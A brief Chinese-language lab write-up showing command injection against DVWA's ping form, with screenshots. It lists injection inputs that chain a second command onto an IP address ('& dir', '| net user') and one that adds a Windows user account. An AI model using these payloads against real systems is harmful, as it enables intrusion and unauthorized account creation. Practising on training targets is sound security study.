DVWA Command injection

# DVWA Command injection ###### tags: `DVWA` `pen_test` > 乾淨的畫面 ![](https://i.imgur.com/JKwDYSw.png) > 不輸入任何參數直接送出後取得的結果 ![](https://i.imgur.com/ziosDey.png) > 從提示上面顯示，他是要執行ping的指令 #### 現在要準備執行注入; ``` 127.0.0.1 & dir ``` ![](https://i.imgur.com/K5gcb48.png) 結果成功，可以順利進行再來我們換一種方式 ``` 127.0.0.1 | net user ``` ![](https://i.imgur.com/dU3L658.png) 也可以執行成功，然後就塞個帳號進去 ``` 127.0.0.1 | net user cmd_injection 1234 /add ``` ![](https://i.imgur.com/wytOoRY.png)